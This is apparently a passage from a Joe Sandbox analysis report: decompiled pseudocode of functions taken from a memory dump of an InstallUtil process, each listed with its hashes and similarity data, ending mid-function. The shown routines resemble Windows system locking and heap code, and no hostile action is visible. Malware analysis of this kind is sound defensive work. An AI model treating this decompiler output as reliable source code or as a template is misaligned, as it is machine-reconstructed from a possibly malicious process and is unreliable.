                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8bbd2430c6cb495fedba160dc3576b64647016c38e62c2a759b6eccb6d298e2c
                      • Instruction ID: 762e56e8f8f11abf392ad492455443812dbd5b0aaed512a43c1a5567b34a4511
                      • Opcode Fuzzy Hash: 8bbd2430c6cb495fedba160dc3576b64647016c38e62c2a759b6eccb6d298e2c
                      • Instruction Fuzzy Hash: 9E51B072E1020ACFCB15CFACC494AAEFBF5BF48350F64815AD659A7340EB71A944CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E012DEF40(intOrPtr __ecx) {
                      				char _v5;
                      				char _v6;
                      				char _v7;
                      				char _v8;
                      				signed int _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				intOrPtr _t58;
                      				char _t59;
                      				signed char _t69;
                      				void* _t73;
                      				signed int _t74;
                      				char _t79;
                      				signed char _t81;
                      				signed int _t85;
                      				signed int _t87;
                      				intOrPtr _t90;
                      				signed char* _t91;
                      				void* _t92;
                      				signed int _t94;
                      				void* _t96;
                      
                      				_t90 = __ecx;
                      				_v16 = __ecx;
                      				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                      					_t58 =  *((intOrPtr*)(__ecx));
                      					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                      						E012C9080(_t73, __ecx, __ecx, _t92);
                      					}
                      				}
                      				_t74 = 0;
                      				_t96 =  *0x7ffe036a - 1;
                      				_v12 = 0;
                      				_v7 = 0;
                      				if(_t96 > 0) {
                      					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                      					_v12 = _t74;
                      					_v7 = _t96 != 0;
                      				}
                      				_t79 = 0;
                      				_v8 = 0;
                      				_v5 = 0;
                      				while(1) {
                      					L4:
                      					_t59 = 1;
                      					L5:
                      					while(1) {
                      						if(_t59 == 0) {
                      							L12:
                      							_t21 = _t90 + 4; // 0x7746c21e
                      							_t87 =  *_t21;
                      							_v6 = 0;
                      							if(_t79 != 0) {
                      								if((_t87 & 0x00000002) != 0) {
                      									goto L19;
                      								}
                      								if((_t87 & 0x00000001) != 0) {
                      									_v6 = 1;
                      									_t74 = _t87 ^ 0x00000003;
                      								} else {
                      									_t51 = _t87 - 2; // -2
                      									_t74 = _t51;
                      								}
                      								goto L15;
                      							} else {
                      								if((_t87 & 0x00000001) != 0) {
                      									_v6 = 1;
                      									_t74 = _t87 ^ 0x00000001;
                      								} else {
                      									_t26 = _t87 - 4; // -4
                      									_t74 = _t26;
                      									if((_t74 & 0x00000002) == 0) {
                      										_t74 = _t74 - 2;
                      									}
                      								}
                      								L15:
                      								if(_t74 == _t87) {
                      									L19:
                      									E012C2D8A(_t74, _t90, _t87, _t90);
                      									_t74 = _v12;
                      									_v8 = 1;
                      									if(_v7 != 0 && _t74 > 0x64) {
                      										_t74 = _t74 - 1;
                      										_v12 = _t74;
                      									}
                      									_t79 = _v5;
                      									goto L4;
                      								}
                      								asm("lock cmpxchg [esi], ecx");
                      								if(_t87 != _t87) {
                      									_t74 = _v12;
                      									_t59 = 0;
                      									_t79 = _v5;
                      									continue;
                      								}
                      								if(_v6 != 0) {
                      									_t74 = _v12;
                      									L25:
                      									if(_v7 != 0) {
                      										if(_t74 < 0x7d0) {
                      											if(_v8 == 0) {
                      												_t74 = _t74 + 1;
                      											}
                      										}
                      										_t38 = _t90 + 0x14; // 0x0
                      										_t39 = _t90 + 0x14; // 0x0
                      										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                      										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                      											_t85 = _t85 & 0xff000000;
                      										}
                      										 *(_t90 + 0x14) = _t85;
                      									}
                      									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                      									 *((intOrPtr*)(_t90 + 8)) = 1;
                      									return 0;
                      								}
                      								_v5 = 1;
                      								_t87 = _t74;
                      								goto L19;
                      							}
                      						}
                      						_t94 = _t74;
                      						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                      						if(_t74 == 0) {
                      							goto L12;
                      						} else {
                      							_t91 = _t90 + 4;
                      							goto L8;
                      							L9:
                      							while((_t81 & 0x00000001) != 0) {
                      								_t69 = _t81;
                      								asm("lock cmpxchg [edi], edx");
                      								if(_t69 != _t81) {
                      									_t81 = _t69;
                      									continue;
                      								}
                      								_t90 = _v16;
                      								goto L25;
                      							}
                      							asm("pause");
                      							_t94 = _t94 - 1;
                      							if(_t94 != 0) {
                      								L8:
                      								_t81 =  *_t91;
                      								goto L9;
                      							} else {
                      								_t90 = _v16;
                      								_t79 = _v5;
                      								goto L12;
                      							}
                      						}
                      					}
                      				}
                      			}





























                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                      • Instruction ID: cc4c19f7220b2bffd12d0626ffc9a415387ded2641aa66b1f34ad7edc950dc92
                      • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                      • Instruction Fuzzy Hash: 5D511530E24246DFEB21CB6CC1C17AEFBB1AF05314F1881E8C6565B286C3B5A98AC751
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 84%
                      			E0139740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                      				signed short* _v8;
                      				intOrPtr _v12;
                      				intOrPtr _t55;
                      				void* _t56;
                      				intOrPtr* _t66;
                      				intOrPtr* _t69;
                      				void* _t74;
                      				intOrPtr* _t78;
                      				intOrPtr* _t81;
                      				intOrPtr* _t82;
                      				intOrPtr _t83;
                      				signed short* _t84;
                      				intOrPtr _t85;
                      				signed int _t87;
                      				intOrPtr* _t90;
                      				intOrPtr* _t93;
                      				intOrPtr* _t94;
                      				void* _t98;
                      
                      				_t84 = __edx;
                      				_t80 = __ecx;
                      				_push(__ecx);
                      				_push(__ecx);
                      				_t55 = __ecx;
                      				_v8 = __edx;
                      				_t87 =  *__edx & 0x0000ffff;
                      				_v12 = __ecx;
                      				_t3 = _t55 + 0x154; // 0x154
                      				_t93 = _t3;
                      				_t78 =  *_t93;
                      				_t4 = _t87 + 2; // 0x2
                      				_t56 = _t4;
                      				while(_t78 != _t93) {
                      					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                      						L4:
                      						_t78 =  *_t78;
                      						continue;
                      					} else {
                      						_t7 = _t78 + 0x18; // 0x18
                      						if(E0131D4F0(_t7, _t84[2], _t87) == _t87) {
                      							_t40 = _t78 + 0xc; // 0xc
                      							_t94 = _t40;
                      							_t90 =  *_t94;
                      							while(_t90 != _t94) {
                      								_t41 = _t90 + 8; // 0x8
                      								_t74 = E0130F380(_a4, _t41, 0x10);
                      								_t98 = _t98 + 0xc;
                      								if(_t74 != 0) {
                      									_t90 =  *_t90;
                      									continue;
                      								}
                      								goto L12;
                      							}
                      							_t82 = L012E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                      							if(_t82 != 0) {
                      								_t46 = _t78 + 0xc; // 0xc
                      								_t69 = _t46;
                      								asm("movsd");
                      								asm("movsd");
                      								asm("movsd");
                      								asm("movsd");
                      								_t85 =  *_t69;
                      								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                      									L20:
                      									_t82 = 3;
                      									asm("int 0x29");
                      								}
                      								 *((intOrPtr*)(_t82 + 4)) = _t69;
                      								 *_t82 = _t85;
                      								 *((intOrPtr*)(_t85 + 4)) = _t82;
                      								 *_t69 = _t82;
                      								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                      								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                      								goto L11;
                      							} else {
                      								L18:
                      								_push(0xe);
                      								_pop(0);
                      							}
                      						} else {
                      							_t84 = _v8;
                      							_t9 = _t87 + 2; // 0x2
                      							_t56 = _t9;
                      							goto L4;
                      						}
                      					}
                      					L12:
                      					return 0;
                      				}
                      				_t10 = _t87 + 0x1a; // 0x1a
                      				_t78 = L012E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                      				if(_t78 == 0) {
                      					goto L18;
                      				} else {
                      					_t12 = _t87 + 2; // 0x2
                      					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                      					_t16 = _t78 + 0x18; // 0x18
                      					E0130F3E0(_t16, _v8[2], _t87);
                      					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                      					_t19 = _t78 + 0xc; // 0xc
                      					_t66 = _t19;
                      					 *((intOrPtr*)(_t66 + 4)) = _t66;
                      					 *_t66 = _t66;
                      					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                      					_t81 = L012E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                      					if(_t81 == 0) {
                      						goto L18;
                      					} else {
                      						_t26 = _t78 + 0xc; // 0xc
                      						_t69 = _t26;
                      						asm("movsd");
                      						asm("movsd");
                      						asm("movsd");
                      						asm("movsd");
                      						_t85 =  *_t69;
                      						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                      							goto L20;
                      						} else {
                      							 *((intOrPtr*)(_t81 + 4)) = _t69;
                      							 *_t81 = _t85;
                      							 *((intOrPtr*)(_t85 + 4)) = _t81;
                      							 *_t69 = _t81;
                      							_t83 = _v12;
                      							 *(_t78 + 8) = 1;
                      							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                      							_t34 = _t83 + 0x154; // 0x1ba
                      							_t69 = _t34;
                      							_t85 =  *_t69;
                      							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                      								goto L20;
                      							} else {
                      								 *_t78 = _t85;
                      								 *((intOrPtr*)(_t78 + 4)) = _t69;
                      								 *((intOrPtr*)(_t85 + 4)) = _t78;
                      								 *_t69 = _t78;
                      								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                      							}
                      						}
                      						goto L11;
                      					}
                      				}
                      				goto L12;
                      			}






















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                      • Instruction ID: 1f2cc733e7bde21adeb8d218c1e6fe07898ff091c0befe943952974c84b868a2
                      • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                      • Instruction Fuzzy Hash: C8516C71610646EFDB26CF18C480A56BBF5FF45308F1480AAE9089F252E771E946CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E012F2990() {
                      				signed int* _t62;
                      				signed int _t64;
                      				intOrPtr _t66;
                      				signed short* _t69;
                      				intOrPtr _t76;
                      				signed short* _t79;
                      				void* _t81;
                      				signed int _t82;
                      				signed short* _t83;
                      				signed int _t87;
                      				intOrPtr _t91;
                      				void* _t98;
                      				signed int _t99;
                      				void* _t101;
                      				signed int* _t102;
                      				void* _t103;
                      				void* _t104;
                      				void* _t107;
                      
                      				_push(0x20);
                      				_push(0x139ff00);
                      				E0131D08C(_t81, _t98, _t101);
                      				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                      				_t99 = 0;
                      				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                      				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                      				if(_t82 == 0) {
                      					_t62 = 0xc0000100;
                      				} else {
                      					 *((intOrPtr*)(_t103 - 4)) = 0;
                      					_t102 = 0xc0000100;
                      					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                      					_t64 = 4;
                      					while(1) {
                      						 *(_t103 - 0x24) = _t64;
                      						if(_t64 == 0) {
                      							break;
                      						}
                      						_t87 = _t64 * 0xc;
                      						 *(_t103 - 0x2c) = _t87;
                      						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x12a1664));
                      						if(_t107 <= 0) {
                      							if(_t107 == 0) {
                      								_t79 = E0130E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x12a1668)), _t82);
                      								_t104 = _t104 + 0xc;
                      								__eflags = _t79;
                      								if(__eflags == 0) {
                      									_t102 = E013451BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x12a166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                      									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                      									break;
                      								} else {
                      									_t64 =  *(_t103 - 0x24);
                      									goto L5;
                      								}
                      								goto L13;
                      							} else {
                      								L5:
                      								_t64 = _t64 - 1;
                      								continue;
                      							}
                      						}
                      						break;
                      					}
                      					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                      					__eflags = _t102;
                      					if(_t102 < 0) {
                      						__eflags = _t102 - 0xc0000100;
                      						if(_t102 == 0xc0000100) {
                      							_t83 =  *((intOrPtr*)(_t103 + 8));
                      							__eflags = _t83;
                      							if(_t83 != 0) {
                      								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                      								__eflags =  *_t83 - _t99;
                      								if( *_t83 == _t99) {
                      									_t102 = 0xc0000100;
                      									goto L19;
                      								} else {
                      									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                      									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                      									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                      									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                      										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                      										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                      											L26:
                      											_t102 = E012F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                      											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                      											__eflags = _t102 - 0xc0000100;
                      											if(_t102 != 0xc0000100) {
                      												goto L12;
                      											} else {
                      												_t99 = 1;
                      												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                      												goto L18;
                      											}
                      										} else {
                      											_t69 = E012D6600( *((intOrPtr*)(_t91 + 0x1c)));
                      											__eflags = _t69;
                      											if(_t69 != 0) {
                      												goto L26;
                      											} else {
                      												_t83 =  *((intOrPtr*)(_t103 + 8));
                      												goto L18;
                      											}
                      										}
                      									} else {
                      										L18:
                      										_t102 = E012F2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                      										L19:
                      										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                      										goto L12;
                      									}
                      								}
                      								L28:
                      							} else {
                      								E012DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                      								 *((intOrPtr*)(_t103 - 4)) = 1;
                      								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                      								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                      								_t76 = E012F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                      								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                      								__eflags = _t76 - 0xc0000100;
                      								if(_t76 == 0xc0000100) {
                      									 *((intOrPtr*)(_t103 - 0x1c)) = E012F2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                      								}
                      								 *((intOrPtr*)(_t103 - 4)) = _t99;
                      								E012F2ACB();
                      							}
                      						}
                      					}
                      					L12:
                      					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                      					_t62 = _t102;
                      				}
                      				L13:
                      				return E0131D0D1(_t62);
                      				goto L28;
                      			}






















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7ed84ab65abfa2802fcc0340dd9cfae695f170dcf0bd3491f45b750a9f8aab66
                      • Instruction ID: 429636a3b9f79ee4aa20bdc779d7fedb8ae0a623ee77057a33a054b3be7a3809
                      • Opcode Fuzzy Hash: 7ed84ab65abfa2802fcc0340dd9cfae695f170dcf0bd3491f45b750a9f8aab66
                      • Instruction Fuzzy Hash: 33517B7191021ADFDF26CF99C880AEEBBB5BF49354F158129EA10AB350C375D952CFA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E012F4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                      				signed int _v8;
                      				short _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				char _v36;
                      				char _v156;
                      				short _v158;
                      				intOrPtr _v160;
                      				char _v164;
                      				intOrPtr _v168;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t45;
                      				intOrPtr _t74;
                      				signed char _t77;
                      				intOrPtr _t84;
                      				char* _t85;
                      				void* _t86;
                      				intOrPtr _t87;
                      				signed short _t88;
                      				signed int _t89;
                      
                      				_t83 = __edx;
                      				_v8 =  *0x13bd360 ^ _t89;
                      				_t45 = _a8 & 0x0000ffff;
                      				_v158 = __edx;
                      				_v168 = __ecx;
                      				if(_t45 == 0) {
                      					L22:
                      					_t86 = 6;
                      					L12:
                      					E012CCC50(_t86);
                      					L11:
                      					return E0130B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                      				}
                      				_t77 = _a4;
                      				if((_t77 & 0x00000001) != 0) {
                      					goto L22;
                      				}
                      				_t8 = _t77 + 0x34; // 0xdce0ba00
                      				if(_t45 !=  *_t8) {
                      					goto L22;
                      				}
                      				_t9 = _t77 + 0x24; // 0x13b8504
                      				E012E2280(_t9, _t9);
                      				_t87 = 0x78;
                      				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                      				E0130FA60( &_v156, 0, _t87);
                      				_t13 = _t77 + 0x30; // 0x3db8
                      				_t85 =  &_v156;
                      				_v36 =  *_t13;
                      				_v28 = _v168;
                      				_v32 = 0;
                      				_v24 = 0;
                      				_v20 = _v158;
                      				_v160 = 0;
                      				while(1) {
                      					_push( &_v164);
                      					_push(_t87);
                      					_push(_t85);
                      					_push(0x18);
                      					_push( &_v36);
                      					_push(0x1e);
                      					_t88 = E0130B0B0();
                      					if(_t88 != 0xc0000023) {
                      						break;
                      					}
                      					if(_t85 !=  &_v156) {
                      						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                      					}
                      					_t84 = L012E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                      					_v168 = _v164;
                      					if(_t84 == 0) {
                      						_t88 = 0xc0000017;
                      						goto L19;
                      					} else {
                      						_t74 = _v160 + 1;
                      						_v160 = _t74;
                      						if(_t74 >= 0x10) {
                      							L19:
                      							_t86 = E012CCCC0(_t88);
                      							if(_t86 != 0) {
                      								L8:
                      								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                      								_t30 = _t77 + 0x24; // 0x13b8504
                      								E012DFFB0(_t77, _t84, _t30);
                      								if(_t84 != 0 && _t84 !=  &_v156) {
                      									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                      								}
                      								if(_t86 != 0) {
                      									goto L12;
                      								} else {
                      									goto L11;
                      								}
                      							}
                      							L6:
                      							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                      							if(_v164 != 0) {
                      								_t83 = _t84;
                      								E012F4F49(_t77, _t84);
                      							}
                      							goto L8;
                      						}
                      						_t87 = _v168;
                      						continue;
                      					}
                      				}
                      				if(_t88 != 0) {
                      					goto L19;
                      				}
                      				goto L6;
                      			}



























                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b89bb0f10ad76b3415b324047e7a02c452d4966471f5619135c57360f74c1a18
                      • Instruction ID: 52861e5d22361dcc058e0ff94d85fb6842a6f7cb0df89416515382a2732e2f18
                      • Opcode Fuzzy Hash: b89bb0f10ad76b3415b324047e7a02c452d4966471f5619135c57360f74c1a18
                      • Instruction Fuzzy Hash: 2641C875A10259AFDB21EF68C941FEAB7F4EF45700F4100A9EA08AB251D774DE80CB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E012F4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                      				signed int _v12;
                      				char _v176;
                      				char _v177;
                      				char _v184;
                      				intOrPtr _v192;
                      				intOrPtr _v196;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed short _t42;
                      				char* _t44;
                      				intOrPtr _t46;
                      				intOrPtr _t50;
                      				char* _t57;
                      				intOrPtr _t59;
                      				intOrPtr _t67;
                      				signed int _t69;
                      
                      				_t64 = __edx;
                      				_v12 =  *0x13bd360 ^ _t69;
                      				_t65 = 0xa0;
                      				_v196 = __edx;
                      				_v177 = 0;
                      				_t67 = __ecx;
                      				_v192 = __ecx;
                      				E0130FA60( &_v176, 0, 0xa0);
                      				_t57 =  &_v176;
                      				_t59 = 0xa0;
                      				if( *0x13b7bc8 != 0) {
                      					L3:
                      					while(1) {
                      						asm("movsd");
                      						asm("movsd");
                      						asm("movsd");
                      						asm("movsd");
                      						_t67 = _v192;
                      						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                      						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                      						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                      						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                      						_push( &_v184);
                      						_push(_t59);
                      						_push(_t57);
                      						_push(0xa0);
                      						_push(_t57);
                      						_push(0xf);
                      						_t42 = E0130B0B0();
                      						if(_t42 != 0xc0000023) {
                      							break;
                      						}
                      						if(_v177 != 0) {
                      							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                      						}
                      						_v177 = 1;
                      						_t44 = L012E4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                      						_t59 = _v184;
                      						_t57 = _t44;
                      						if(_t57 != 0) {
                      							continue;
                      						} else {
                      							_t42 = 0xc0000017;
                      							break;
                      						}
                      					}
                      					if(_t42 != 0) {
                      						_t65 = E012CCCC0(_t42);
                      						if(_t65 != 0) {
                      							L10:
                      							if(_v177 != 0) {
                      								if(_t57 != 0) {
                      									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                      								}
                      							}
                      							_t46 = _t65;
                      							L12:
                      							return E0130B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                      						}
                      						L7:
                      						_t50 = _a4;
                      						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                      						if(_t50 != 3) {
                      							if(_t50 == 2) {
                      								goto L8;
                      							}
                      							L9:
                      							if(E0130F380(_t67 + 0xc, 0x12a5138, 0x10) == 0) {
                      								 *0x13b60d8 = _t67;
                      							}
                      							goto L10;
                      						}
                      						L8:
                      						_t64 = _t57 + 0x28;
                      						E012F4F49(_t67, _t57 + 0x28);
                      						goto L9;
                      					}
                      					_t65 = 0;
                      					goto L7;
                      				}
                      				if(E012F4E70(0x13b86b0, 0x12f5690, 0, 0) != 0) {
                      					_t46 = E012CCCC0(_t56);
                      					goto L12;
                      				} else {
                      					_t59 = 0xa0;
                      					goto L3;
                      				}
                      			}





















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 907f71425e03bf0e1bfb34fd890cc0953740fc088ea448084463d1b7ab6e0741
                      • Instruction ID: 51cbbd85c01ccfa8b4da69d6fa000d4f525cf9254f5a3ec53affd774cc1e1709
                      • Opcode Fuzzy Hash: 907f71425e03bf0e1bfb34fd890cc0953740fc088ea448084463d1b7ab6e0741
                      • Instruction Fuzzy Hash: 1941C371A54358AFEB32EF18CC81FA7B7A9EB54614F0000ADEB4597281D7B0DE44CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E012D8A0A(intOrPtr* __ecx, signed int __edx) {
                      				signed int _v8;
                      				char _v524;
                      				signed int _v528;
                      				void* _v532;
                      				char _v536;
                      				char _v540;
                      				char _v544;
                      				intOrPtr* _v548;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t44;
                      				void* _t46;
                      				void* _t48;
                      				signed int _t53;
                      				signed int _t55;
                      				intOrPtr* _t62;
                      				void* _t63;
                      				unsigned int _t75;
                      				signed int _t79;
                      				unsigned int _t81;
                      				unsigned int _t83;
                      				signed int _t84;
                      				void* _t87;
                      
                      				_t76 = __edx;
                      				_v8 =  *0x13bd360 ^ _t84;
                      				_v536 = 0x200;
                      				_t79 = 0;
                      				_v548 = __edx;
                      				_v544 = 0;
                      				_t62 = __ecx;
                      				_v540 = 0;
                      				_v532 =  &_v524;
                      				if(__edx == 0 || __ecx == 0) {
                      					L6:
                      					return E0130B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                      				} else {
                      					_v528 = 0;
                      					E012DE9C0(1, __ecx, 0, 0,  &_v528);
                      					_t44 = _v528;
                      					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                      					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                      					_t46 = 0xa;
                      					_t87 = _t81 - _t46;
                      					if(_t87 > 0 || _t87 == 0) {
                      						 *_v548 = 0x12a1180;
                      						L5:
                      						_t79 = 1;
                      						goto L6;
                      					} else {
                      						_t48 = E012F1DB5(_t62,  &_v532,  &_v536);
                      						_t76 = _v528;
                      						if(_t48 == 0) {
                      							L9:
                      							E01303C2A(_t81, _t76,  &_v544);
                      							 *_v548 = _v544;
                      							goto L5;
                      						}
                      						_t62 = _v532;
                      						if(_t62 != 0) {
                      							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                      							_t53 =  *_t62;
                      							_v528 = _t53;
                      							if(_t53 != 0) {
                      								_t63 = _t62 + 4;
                      								_t55 = _v528;
                      								do {
                      									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                      										if(E012D8999(_t63,  &_v540) == 0) {
                      											_t55 = _v528;
                      										} else {
